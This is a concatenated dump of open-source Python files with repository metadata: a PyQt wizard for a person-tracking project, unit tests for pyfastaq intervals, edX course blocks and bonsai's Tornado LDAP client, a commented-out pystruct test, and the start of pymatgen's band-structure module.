self.personProjectSearchForLabel.setObjectName(_fromUtf8("personProjectSearchForLabel"))
self.gridLayout.addWidget(self.personProjectSearchForLabel, 0, 0, 1, 2)
self.personProjectSearchResultsLabel = QtGui.QLabel(self.personProjectWizardPage2)
self.personProjectSearchResultsLabel.setObjectName(_fromUtf8("personProjectSearchResultsLabel"))
self.gridLayout.addWidget(self.personProjectSearchResultsLabel, 4, 0, 1, 1)
self.personProjectSelectedTargetsLabel = QtGui.QLabel(self.personProjectWizardPage2)
self.personProjectSelectedTargetsLabel.setObjectName(_fromUtf8("personProjectSelectedTargetsLabel"))
self.gridLayout.addWidget(self.personProjectSelectedTargetsLabel, 8, 0, 1, 1)
self.personProjectSearchInLabel = QtGui.QLabel(self.personProjectWizardPage2)
self.personProjectSearchInLabel.setObjectName(_fromUtf8("personProjectSearchInLabel"))
self.gridLayout.addWidget(self.personProjectSearchInLabel, 1, 0, 1, 2)
spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem2, 3, 2, 1, 1)
self.personProjectSearchForDetailsLabel = QtGui.QLabel(self.personProjectWizardPage2)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.personProjectSearchForDetailsLabel.sizePolicy().hasHeightForWidth())
self.personProjectSearchForDetailsLabel.setSizePolicy(sizePolicy)
self.personProjectSearchForDetailsLabel.setObjectName(_fromUtf8("personProjectSearchForDetailsLabel"))
self.gridLayout.addWidget(self.personProjectSearchForDetailsLabel, 0, 3, 1, 1)
self.personProjectAvailablePluginsScrollArea = QtGui.QScrollArea(self.personProjectWizardPage2)
self.personProjectAvailablePluginsScrollArea.setWidgetResizable(True)
self.personProjectAvailablePluginsScrollArea.setObjectName(_fromUtf8("personProjectAvailablePluginsScrollArea"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 98, 91))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.verticalLayout = QtGui.QVBoxLayout(self.scrollAreaWidgetContents)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.personProjectAvailablePluginsListView = QtGui.QListView(self.scrollAreaWidgetContents)
self.personProjectAvailablePluginsListView.setObjectName(_fromUtf8("personProjectAvailablePluginsListView"))
self.verticalLayout.addWidget(self.personProjectAvailablePluginsListView)
self.personProjectAvailablePluginsScrollArea.setWidget(self.scrollAreaWidgetContents)
self.gridLayout.addWidget(self.personProjectAvailablePluginsScrollArea, 1, 2, 1, 2)
self.personProjectSearchForValue = QtGui.QLineEdit(self.personProjectWizardPage2)
self.personProjectSearchForValue.setObjectName(_fromUtf8("personProjectSearchForValue"))
self.gridLayout.addWidget(self.personProjectSearchForValue, 0, 2, 1, 1)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem3)
self.personProjectSearchButton = QtGui.QPushButton(self.personProjectWizardPage2)
self.personProjectSearchButton.setDefault(True)
self.personProjectSearchButton.setObjectName(_fromUtf8("personProjectSearchButton"))
self.horizontalLayout_2.addWidget(self.personProjectSearchButton)
self.gridLayout.addLayout(self.horizontalLayout_2, 3, 3, 1, 1)
spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem4, 5, 2, 1, 1)
spacerItem5 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem5, 9, 2, 1, 1)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem6)
self.btnRemoveTarget = QtGui.QPushButton(self.personProjectWizardPage2)
self.btnRemoveTarget.setFocusPolicy(QtCore.Qt.NoFocus)
self.btnRemoveTarget.setStyleSheet(_fromUtf8(""))
self.btnRemoveTarget.setObjectName(_fromUtf8("btnRemoveTarget"))
self.horizontalLayout_3.addWidget(self.btnRemoveTarget)
self.gridLayout.addLayout(self.horizontalLayout_3, 9, 3, 1, 1)
personProjectWizard.addPage(self.personProjectWizardPage2)
self.personProjectWizardPage3 = QtGui.QWizardPage()
self.personProjectWizardPage3.setObjectName(_fromUtf8("personProjectWizardPage3"))
self.personProjectWizardSearchConfigPluginsList = QtGui.QListView(self.personProjectWizardPage3)
self.personProjectWizardSearchConfigPluginsList.setGeometry(QtCore.QRect(0, 0, 256, 531))
self.personProjectWizardSearchConfigPluginsList.setObjectName(_fromUtf8("personProjectWizardSearchConfigPluginsList"))
self.searchConfiguration = QtGui.QStackedWidget(self.personProjectWizardPage3)
self.searchConfiguration.setGeometry(QtCore.QRect(260, 0, 591, 531))
self.searchConfiguration.setObjectName(_fromUtf8("searchConfiguration"))
personProjectWizard.addPage(self.personProjectWizardPage3)
self.personProjectWizardPage4 = QtGui.QWizardPage()
self.personProjectWizardPage4.setObjectName(_fromUtf8("personProjectWizardPage4"))
self.gridLayout_2 = QtGui.QGridLayout(self.personProjectWizardPage4)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
personProjectWizard.addPage(self.personProjectWizardPage4)
self.retranslateUi(personProjectWizard)
QtCore.QMetaObject.connectSlotsByName(personProjectWizard)
def retranslateUi(self, personProjectWizard):
personProjectWizard.setWindowTitle(QtGui.QApplication.translate("personProjectWizard", "New Person Project", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage1.setTitle(QtGui.QApplication.translate("personProjectWizard", "Step 1 - Set Project Metadata", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage1.setSubTitle(QtGui.QApplication.translate("personProjectWizard", "Add project related information", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectNameValue.setPlaceholderText(QtGui.QApplication.translate("personProjectWizard", "Add a name for your project", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectNameLabel.setText(QtGui.QApplication.translate("personProjectWizard", "Project Name ", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectKeywordsValue.setPlaceholderText(QtGui.QApplication.translate("personProjectWizard", "Add comma seperated keywords for your project", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectDescriptionLabel.setText(QtGui.QApplication.translate("personProjectWizard", "Description", None, QtGui.QApplication.UnicodeUTF8))
self.personProkectKeywordsLabel.setText(QtGui.QApplication.translate("personProjectWizard", "Keywords", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage2.setTitle(QtGui.QApplication.translate("personProjectWizard", "Step 2 - Set the target", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage2.setSubTitle(QtGui.QApplication.translate("personProjectWizard", "Search for the person you want to track using the available plugins and add it to the <font color=\"red\">selected targets</font> by drag and drop or by clicking \"Add To Targets\"", None, QtGui.QApplication.UnicodeUTF8))
self.btnAddTarget.setText(QtGui.QApplication.translate("personProjectWizard", "Add To Targets", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchForLabel.setText(QtGui.QApplication.translate("personProjectWizard", "<html><head/><body><p><span style=\" font-weight:600;\">Search for</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchResultsLabel.setText(QtGui.QApplication.translate("personProjectWizard", "<html><head/><body><p><span style=\" font-weight:600;\">Search Results </span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSelectedTargetsLabel.setText(QtGui.QApplication.translate("personProjectWizard", "<html><head/><body><p><span style=\" font-weight:600; color:#ff0000;\">Selected Targets</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchInLabel.setText(QtGui.QApplication.translate("personProjectWizard", "<html><head/><body><p><span style=\" font-weight:600;\">Search In</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchForDetailsLabel.setText(QtGui.QApplication.translate("personProjectWizard", "Search by username, mail, full name, id", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchButton.setToolTip(QtGui.QApplication.translate("personProjectWizard", "Search for targets in the selected plugins", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchButton.setText(QtGui.QApplication.translate("personProjectWizard", "Search", None, QtGui.QApplication.UnicodeUTF8))
self.btnRemoveTarget.setText(QtGui.QApplication.translate("personProjectWizard", "Remove Selected", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage3.setTitle(QtGui.QApplication.translate("personProjectWizard", "Step 3 - Set Parameters", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage3.setSubTitle(QtGui.QApplication.translate("personProjectWizard", "Provide the necessary search parameters for the plugins you are using", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage4.setTitle(QtGui.QApplication.translate("personProjectWizard", "Step 4 - Finalize Project", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage4.setSubTitle(QtGui.QApplication.translate("personProjectWizard", "Click Finish to save the Project Configuration ", None, QtGui.QApplication.UnicodeUTF8))
import creepy_resources_rc
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
personProjectWizard = QtGui.QWizard()
ui = Ui_personProjectWizard()
ui.setupUi(personProjectWizard)
personProjectWizard.show()
sys.exit(app.exec_())
| gpl-3.0 | 22,272,355,462,730,944 | 82.417778 | 324 | 0.779424 | false |
martinghunt/Fastaq | pyfastaq/tests/intervals_test.py | 2 | 9339 | #!/usr/bin/env python3
import unittest
from pyfastaq import intervals
class TestIntervals(unittest.TestCase):
def test_init(self):
'''Throw error when constructing an Interval from a non-int, or with end < start'''
with self.assertRaises(intervals.Error):
intervals.Interval('a', 1)
with self.assertRaises(intervals.Error):
intervals.Interval(1, 'a')
with self.assertRaises(intervals.Error):
intervals.Interval('a', 'a')
with self.assertRaises(intervals.Error):
intervals.Interval(3, 2)
def test_comparisons(self):
'''<, <=, == should work as expected'''
self.assertTrue(intervals.Interval(1,2) < intervals.Interval(2,2))
self.assertTrue(intervals.Interval(1,2) <= intervals.Interval(2,2))
self.assertFalse(intervals.Interval(2,2) <= intervals.Interval(1,2))
self.assertFalse(intervals.Interval(2,2) < intervals.Interval(1,2))
self.assertFalse(intervals.Interval(2,2) < intervals.Interval(2,2))
self.assertTrue(intervals.Interval(1,2) == intervals.Interval(1,2))
self.assertFalse(intervals.Interval(1,2) == intervals.Interval(1,3))
self.assertTrue(intervals.Interval(1,2) != intervals.Interval(1,3))
self.assertFalse(intervals.Interval(1,2) != intervals.Interval(1,2))
def test_len(self):
self.assertEqual(len(intervals.Interval(1,2)), 2)
self.assertEqual(len(intervals.Interval(1,1)), 1)
self.assertEqual(len(intervals.Interval(10,20)), 11)
def test_distance_to_point(self):
'''Test distance_to_point'''
self.assertEqual(0, intervals.Interval(42, 50).distance_to_point(42))
self.assertEqual(0, intervals.Interval(42, 50).distance_to_point(44))
self.assertEqual(0, intervals.Interval(42, 50).distance_to_point(50))
self.assertEqual(1, intervals.Interval(42, 50).distance_to_point(41))
self.assertEqual(1, intervals.Interval(42, 50).distance_to_point(51))
self.assertEqual(5, intervals.Interval(42, 50).distance_to_point(55))
self.assertEqual(5, intervals.Interval(42, 50).distance_to_point(37))
def test_intersects(self):
'''Intersection of two intervals should do the right thing'''
a = intervals.Interval(5, 10)
no_intersect = [intervals.Interval(3, 4),
intervals.Interval(11,20)]
intersect = [intervals.Interval(3,5),
intervals.Interval(3,6),
intervals.Interval(9,12),
intervals.Interval(10,12),
intervals.Interval(6,7),
intervals.Interval(1,20)]
for i in no_intersect:
self.assertFalse(a.intersects(i), 'shouldn\'t intersect: ' + str(a) + ', ' + str(i))
for i in intersect:
self.assertTrue(a.intersects(i), 'should intersect: ' + str(a) + ', ' + str(i))
def test_contains(self):
'''Check that contains() works as expected'''
a = intervals.Interval(5, 10)
not_contained = [intervals.Interval(1,2),
intervals.Interval(4,5),
intervals.Interval(4,10),
intervals.Interval(4,11),
intervals.Interval(5,11),
intervals.Interval(1,2),
intervals.Interval(9,11),
intervals.Interval(10,11),
intervals.Interval(11,20)]
contained = [intervals.Interval(5,5),
intervals.Interval(5,10),
intervals.Interval(6,7),
intervals.Interval(6,10),
intervals.Interval(10,10)]
for i in not_contained:
self.assertFalse(a.contains(i), 'shouldn\'t contain: ' + str(a) + ', ' + str(i))
for i in contained:
self.assertTrue(a.contains(i), 'should contain: ' + str(a) + ', ' + str(i))
def test_union(self):
'''Union should either return None or the correct union'''
a = intervals.Interval(5, 10)
b = intervals.Interval(8, 15)
c = intervals.Interval(12, 20)
d = intervals.Interval(21,22)
self.assertEqual(a.union(c), None)
self.assertEqual(c.union(a), None)
self.assertEqual(a.union(b), intervals.Interval(5,15))
self.assertEqual(b.union(a), intervals.Interval(5,15))
self.assertEqual(c.union(d), intervals.Interval(12,22))
self.assertEqual(d.union(c), intervals.Interval(12,22))
def test_union_flll_gap(self):
'''union_fill_gap() should ignore intersections and return the maximum range of coords'''
a = intervals.Interval(5, 10)
b = intervals.Interval(8, 15)
c = intervals.Interval(12, 20)
d = intervals.Interval(21,22)
self.assertEqual(a.union_fill_gap(c), intervals.Interval(5,20))
self.assertEqual(c.union_fill_gap(a), intervals.Interval(5,20))
self.assertEqual(a.union_fill_gap(b), intervals.Interval(5,15))
self.assertEqual(b.union_fill_gap(a), intervals.Interval(5,15))
self.assertEqual(c.union_fill_gap(d), intervals.Interval(12,22))
self.assertEqual(d.union_fill_gap(c), intervals.Interval(12,22))
def test_intersection(self):
'''Intersection should either return None or the correct intersection'''
a = intervals.Interval(5, 10)
b = intervals.Interval(8, 15)
c = intervals.Interval(12, 20)
self.assertEqual(a.intersection(c), None)
self.assertEqual(a.intersection(b), intervals.Interval(8,10))
class Test_intersection(unittest.TestCase):
def test_intersection(self):
'''intersection() should correctly intersect two lists of intervals'''
a = [intervals.Interval(1,2),
intervals.Interval(10,20),
intervals.Interval(51,52),
intervals.Interval(54,55),
intervals.Interval(57,58)]
b = [intervals.Interval(5,6),
intervals.Interval(9,11),
intervals.Interval(13,14),
intervals.Interval(17,18),
intervals.Interval(20,25),
intervals.Interval(50,60)]
c = [intervals.Interval(100,200)]
i = [intervals.Interval(10,11),
intervals.Interval(13,14),
intervals.Interval(17,18),
intervals.Interval(20,20),
intervals.Interval(51,52),
intervals.Interval(54,55),
intervals.Interval(57,58)]
self.assertSequenceEqual(intervals.intersection(a,b), i)
self.assertSequenceEqual(intervals.intersection(b,a), i)
self.assertSequenceEqual(intervals.intersection(c,a), [])
self.assertEqual(intervals.intersection([],a), [])
self.assertEqual(intervals.intersection(a,[]), [])
class Test_merge_overlapping_in_list(unittest.TestCase):
def test_merge_overlapping_in_list(self):
'''merge_overlapping_in_list() merges correctly'''
a = [intervals.Interval(1,2),
intervals.Interval(51,60),
intervals.Interval(10,20),
intervals.Interval(20,30),
intervals.Interval(20,30),
intervals.Interval(29,50),
intervals.Interval(65,70)]
b = [intervals.Interval(1,2),
intervals.Interval(10,60),
intervals.Interval(65,70)]
intervals.merge_overlapping_in_list(a)
self.assertSequenceEqual(a, b)
class Test_remove_contained_in_list(unittest.TestCase):
def test_remove_contained_in_list(self):
'''test_remove_contained_in_list removes the right elements of list'''
a = [intervals.Interval(1,2),
intervals.Interval(4,4),
intervals.Interval(4,5),
intervals.Interval(5,6),
intervals.Interval(7,9),
intervals.Interval(8,10),
intervals.Interval(9,11),
intervals.Interval(20,25),
intervals.Interval(20,24),
intervals.Interval(20,26),
intervals.Interval(30,38),
intervals.Interval(30,37),
intervals.Interval(30,36),
intervals.Interval(30,35),
intervals.Interval(30,35),
intervals.Interval(32,33),
intervals.Interval(38,50),
intervals.Interval(65,70),
intervals.Interval(67,70)]
b = [intervals.Interval(1,2),
intervals.Interval(4,5),
intervals.Interval(5,6),
intervals.Interval(7,9),
intervals.Interval(8,10),
intervals.Interval(9,11),
intervals.Interval(20,26),
intervals.Interval(30,38),
intervals.Interval(38,50),
intervals.Interval(65,70)]
intervals.remove_contained_in_list(a)
self.assertSequenceEqual(a, b)
class Test_length_sum_from_list(unittest.TestCase):
def test_length_sum_from_list(self):
'''Test that total length of intervals is summed correctly'''
a = [intervals.Interval(1,2),
intervals.Interval(4,5),
intervals.Interval(10,19)]
self.assertEqual(14, intervals.length_sum_from_list(a))
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 6,391,297,924,381,389,000 | 41.067568 | 97 | 0.593747 | false |
wattlebird/pystruct | pystruct/tests/test_learners/test_primal_dual.py | 5 | 1151 | #from crf import BinaryGridCRF
#from structured_svm import NSlackSSVM, SubgradientSSVM
#from structured_svm import objective_primal, PrimalDSStructuredSVM
#from toy_datasets import binary
#def test_primal_dual_binary():
#for C in [1, 100, 100000]:
#for dataset in binary:
#X, Y = dataset(n_samples=1)
#crf = BinaryGridCRF()
#clf = NSlackSSVM(model=crf, max_iter=200, C=C,
#check_constraints=True)
#clf.fit(X, Y)
#clf2 = SubgradientSSVM(model=crf, max_iter=200, C=C)
#clf2.fit(X, Y)
#clf3 = PrimalDSStructuredSVM(model=crf, max_iter=200, C=C)
#clf3.fit(X, Y)
#obj = objective_primal(crf, clf.w, X, Y, C)
## the dual finds the optimum so it might be better
#obj2 = objective_primal(crf, clf2.w, X, Y, C)
#obj3 = objective_primal(crf, clf3.w, X, Y, C)
#assert(obj <= obj2)
#assert(obj <= obj3)
#print("objective difference: %f\n" % (obj2 - obj))
#print("objective difference DS: %f\n" % (obj3 - obj))
#test_primal_dual_binary()
| bsd-2-clause | -4,332,070,732,081,085,400 | 41.62963 | 71 | 0.56907 | false |
solashirai/edx-platform | lms/djangoapps/course_blocks/tests/test_signals.py | 9 | 2116 | """
Unit tests for the Course Blocks signals
"""
from xmodule.modulestore.exceptions import ItemNotFoundError
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from ..api import get_course_blocks, _get_block_structure_manager
from ..transformers.visibility import VisibilityTransformer
from .helpers import is_course_in_block_structure_cache, EnableTransformerRegistryMixin
class CourseBlocksSignalTest(EnableTransformerRegistryMixin, ModuleStoreTestCase):
"""
Tests for the Course Blocks signal
"""
def setUp(self):
super(CourseBlocksSignalTest, self).setUp(create_user=True)
self.course = CourseFactory.create()
self.course_usage_key = self.store.make_course_usage_key(self.course.id)
def test_course_publish(self):
# course is not visible to staff only
self.assertFalse(self.course.visible_to_staff_only)
orig_block_structure = get_course_blocks(self.user, self.course_usage_key)
self.assertFalse(
VisibilityTransformer.get_visible_to_staff_only(orig_block_structure, self.course_usage_key)
)
# course becomes visible to staff only
self.course.visible_to_staff_only = True
self.store.update_item(self.course, self.user.id)
updated_block_structure = get_course_blocks(self.user, self.course_usage_key)
self.assertTrue(
VisibilityTransformer.get_visible_to_staff_only(updated_block_structure, self.course_usage_key)
)
def test_course_delete(self):
get_course_blocks(self.user, self.course_usage_key)
bs_manager = _get_block_structure_manager(self.course.id)
self.assertIsNotNone(bs_manager.get_collected())
self.assertTrue(is_course_in_block_structure_cache(self.course.id, self.store))
self.store.delete_course(self.course.id, self.user.id)
with self.assertRaises(ItemNotFoundError):
bs_manager.get_collected()
self.assertFalse(is_course_in_block_structure_cache(self.course.id, self.store))
| agpl-3.0 | 445,194,021,282,653,900 | 40.490196 | 107 | 0.721645 | false |
Noirello/PyLDAP | tests/test_tornado.py | 1 | 7802 | import unittest
import sys
import pytest
from conftest import get_config, network_delay
from bonsai import LDAPClient
from bonsai import LDAPEntry
import bonsai.errors
def dummy(timeout=None):
def dummy_f(f):
return f
return dummy_f
try:
from tornado import gen
from tornado.testing import gen_test
from tornado.testing import AsyncTestCase
from bonsai.tornado import TornadoLDAPConnection
TestCaseClass = AsyncTestCase
MOD_INSTALLED = True
except ImportError:
TestCaseClass = unittest.TestCase
gen_test = dummy
MOD_INSTALLED = False
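# Added note: the try/except above lets this module import even when Tornado is
# absent; gen_test degrades to a no-op decorator and the skipif marker below then
# skips the whole test class.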
@pytest.mark.skipif(not MOD_INSTALLED, reason="Tornado is not installed.")
class TornadoLDAPConnectionTest(TestCaseClass):
""" Test TornadoLDAPConnection object. """
def setUp(self):
""" Set LDAP URL and open connection. """
self.cfg = get_config()
self.url = "ldap://%s:%s/%s?%s?%s" % (
self.cfg["SERVER"]["hostip"],
self.cfg["SERVER"]["port"],
self.cfg["SERVER"]["basedn"],
self.cfg["SERVER"]["search_attr"],
self.cfg["SERVER"]["search_scope"],
)
self.basedn = self.cfg["SERVER"]["basedn"]
self.ipaddr = self.cfg["SERVER"]["hostip"]
self.client = LDAPClient(self.url)
self.client.set_credentials(
"SIMPLE",
user=self.cfg["SIMPLEAUTH"]["user"],
password=self.cfg["SIMPLEAUTH"]["password"],
)
self.client.set_async_connection_class(TornadoLDAPConnection)
self.io_loop = self.get_new_ioloop()
@gen_test(timeout=20.0)
def test_connection(self):
""" Test opening a connection. """
conn = yield self.client.connect(True, ioloop=self.io_loop)
assert conn is not None
assert not conn.closed
conn.close()
@gen_test(timeout=20.0)
def test_search(self):
""" Test search. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
res = yield conn.search()
assert res is not None
@gen_test(timeout=20.0)
def test_add_and_delete(self):
""" Test addding and deleting an LDAP entry. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
entry = LDAPEntry("cn=async_test,%s" % self.basedn)
entry["objectclass"] = [
"top",
"inetOrgPerson",
"person",
"organizationalPerson",
]
entry["sn"] = "async_test"
try:
yield conn.add(entry)
except bonsai.errors.AlreadyExists:
yield conn.delete(entry.dn)
yield conn.add(entry)
except:
self.fail("Unexpected error.")
res = yield conn.search()
assert entry in res
yield entry.delete()
res = yield conn.search()
assert entry not in res
@gen_test(timeout=20.0)
def test_recursive_delete(self):
""" Test removing a subtree recursively. """
org1 = bonsai.LDAPEntry("ou=testusers,%s" % self.basedn)
org1.update({"objectclass": ["organizationalUnit", "top"], "ou": "testusers"})
org2 = bonsai.LDAPEntry("ou=tops,ou=testusers,%s" % self.basedn)
org2.update({"objectclass": ["organizationalUnit", "top"], "ou": "tops"})
entry = bonsai.LDAPEntry("cn=tester,ou=tops,ou=testusers,%s" % self.basedn)
entry.update(
{"objectclass": ["top", "inetorgperson"], "cn": "tester", "sn": "example"}
)
try:
with (
yield self.client.connect(True, timeout=10.0, ioloop=self.io_loop)
) as conn:
yield conn.add(org1)
yield conn.add(org2)
yield conn.add(entry)
with pytest.raises(bonsai.errors.NotAllowedOnNonleaf):
yield conn.delete(org1.dn)
yield conn.delete(org1.dn, recursive=True)
res = yield conn.search(org1.dn, 2)
assert res == []
except bonsai.LDAPError as err:
self.fail("Recursive delete is failed: %s" % err)
@gen_test(timeout=20.0)
def test_modify_and_rename(self):
""" Test modifying and renaming an LDAP entry. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
entry = LDAPEntry("cn=async_test,%s" % self.basedn)
entry["objectclass"] = [
"top",
"inetOrgPerson",
"person",
"organizationalPerson",
]
entry["sn"] = "async_test"
oldname = "cn=async_test,%s" % self.basedn
newname = "cn=async_test2,%s" % self.basedn
res = yield conn.search(newname, 0)
if res:
yield res[0].delete()
try:
yield conn.add(entry)
except bonsai.errors.AlreadyExists:
yield conn.delete(entry.dn)
yield conn.add(entry)
except:
self.fail("Unexpected error.")
entry["sn"] = "async_test2"
yield entry.modify()
yield entry.rename(newname)
res = yield conn.search(entry.dn, 0, attrlist=["sn"])
assert entry["sn"] == res[0]["sn"]
res = yield conn.search(oldname, 0)
assert res == []
yield conn.delete(entry.dn)
@gen_test(timeout=20.0)
def test_obj_err(self):
""" Test object class violation error. """
entry = LDAPEntry("cn=async_test,%s" % self.basedn)
entry["cn"] = ["async_test"]
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
with pytest.raises(bonsai.errors.ObjectClassViolation):
yield conn.add(entry)
@gen_test(timeout=20.0)
def test_whoami(self):
""" Test whoami. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
obj = yield conn.whoami()
expected_res = [
"dn:%s" % self.cfg["SIMPLEAUTH"]["user"],
self.cfg["SIMPLEAUTH"]["adusername"],
]
assert obj in expected_res
@gen_test(timeout=12.0)
def test_connection_timeout(self):
""" Test connection timeout. """
with network_delay(7.0):
with pytest.raises(gen.TimeoutError):
yield self.client.connect(True, ioloop=self.io_loop, timeout=8.0)
@gen_test(timeout=18.0)
def test_search_timeout(self):
""" Test search timeout. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
with network_delay(7.0):
with pytest.raises(gen.TimeoutError):
yield conn.search(timeout=3.0)
@pytest.mark.skipif(
sys.version_info.minor < 5,
reason="No __aiter__ and __anext__ methods under 3.5.",
)
@gen_test(timeout=20.0)
def test_paged_search(self):
""" Test paged search. """
search_dn = "ou=nerdherd,%s" % self.basedn
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
# To keep compatibility with Python 3.4 it does not use async for,
# but its while-loop equivalent.
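# Rough async-for sketch of the same traversal under Python 3.5+ (illustrative
# only; how paged_search is awaited depends on the bonsai API version):
#   async for entry in (await conn.paged_search(search_dn, 1, page_size=3)):
#       assert isinstance(entry, LDAPEntry)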
res_iter = yield conn.paged_search(search_dn, 1, page_size=3)
res_iter = type(res_iter).__aiter__(res_iter)
cnt = 0
while True:
try:
res = yield type(res_iter).__anext__(res_iter)
assert isinstance(res, LDAPEntry)
cnt += 1
except StopAsyncIteration:
break
assert cnt == 6
| mit | 865,521,617,047,090,800 | 35.629108 | 86 | 0.550244 | false |
montoyjh/pymatgen | pymatgen/electronic_structure/bandstructure.py | 1 | 41712 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import numpy as np
import math
import itertools
import collections
import warnings
from monty.json import MSONable
from pymatgen.core.periodic_table import get_el_sp
from pymatgen.core.structure import Structure
from pymatgen.core.lattice import Lattice
from pymatgen.electronic_structure.core import Spin, Orbital
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.coord import pbc_diff
"""
This module provides classes to define everything related to band structures.
"""
__author__ = "Geoffroy Hautier, Shyue Ping Ong, Michael Kocher"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "1.0"
__maintainer__ = "Geoffroy Hautier"
__email__ = "[email protected]"
__status__ = "Development"
__date__ = "March 14, 2012"
class Kpoint(MSONable):
"""
Class to store kpoint objects. A kpoint is defined with a lattice and
fractional or cartesian coordinates, using a syntax similar to that of the
site objects in pymatgen.core.structure.
Args:
coords: coordinate of the kpoint as a numpy array
lattice: A pymatgen.core.lattice.Lattice lattice object representing
the reciprocal lattice of the kpoint
to_unit_cell: Translates fractional coordinate to the basic unit
cell, i.e., all fractional coordinates satisfy 0 <= a < 1.
Defaults to False.
coords_are_cartesian: Boolean indicating if the coordinates given are
in cartesian or fractional coordinates (by default fractional)
label: the label of the kpoint if any (None by default)
"""
def __init__(self, coords, lattice, to_unit_cell=False,
coords_are_cartesian=False, label=None):
self._lattice = lattice
self._fcoords = lattice.get_fractional_coords(coords) \
if coords_are_cartesian else coords
self._label = label
if to_unit_cell:
for i in range(len(self._fcoords)):
self._fcoords[i] -= math.floor(self._fcoords[i])
self._ccoords = lattice.get_cartesian_coords(self._fcoords)
@property
def lattice(self):
"""
The lattice associated with the kpoint. It's a
pymatgen.core.lattice.Lattice object
"""
return self._lattice
@property
def label(self):
"""
The label associated with the kpoint
"""
return self._label
@property
def frac_coords(self):
"""
The fractional coordinates of the kpoint as a numpy array
"""
return np.copy(self._fcoords)
@property
def cart_coords(self):
"""
The cartesian coordinates of the kpoint as a numpy array
"""
return np.copy(self._ccoords)
@property
def a(self):
"""
Fractional a coordinate of the kpoint
"""
return self._fcoords[0]
@property
def b(self):
"""
Fractional b coordinate of the kpoint
"""
return self._fcoords[1]
@property
def c(self):
"""
Fractional c coordinate of the kpoint
"""
return self._fcoords[2]
def __str__(self):
"""
Returns a string with fractional, cartesian coordinates and label
"""
return "{} {} {}".format(self.frac_coords, self.cart_coords,
self.label)
def as_dict(self):
"""
Json-serializable dict representation of a kpoint
"""
return {"lattice": self.lattice.as_dict(),
"fcoords": list(self.frac_coords),
"ccoords": list(self.cart_coords), "label": self.label,
"@module": self.__class__.__module__,
"@class": self.__class__.__name__}
class BandStructure:
"""
    This is the most generic band structure data possible;
    it's defined by a list of kpoints + energies for each of them.
.. attribute:: kpoints:
the list of kpoints (as Kpoint objects) in the band structure
.. attribute:: lattice_rec
the reciprocal lattice of the band structure.
.. attribute:: efermi
the fermi energy
.. attribute:: is_spin_polarized
True if the band structure is spin-polarized, False otherwise
.. attribute:: bands
The energy eigenvalues as a {spin: ndarray}. Note that the use of an
ndarray is necessary for computational as well as memory efficiency
due to the large amount of numerical data. The indices of the ndarray
are [band_index, kpoint_index].
.. attribute:: nb_bands
returns the number of bands in the band structure
.. attribute:: structure
returns the structure
.. attribute:: projections
The projections as a {spin: ndarray}. Note that the use of an
ndarray is necessary for computational as well as memory efficiency
due to the large amount of numerical data. The indices of the ndarray
are [band_index, kpoint_index, orbital_index, ion_index].
Args:
kpoints: list of kpoint as numpy arrays, in frac_coords of the
given lattice by default
eigenvals: dict of energies for spin up and spin down
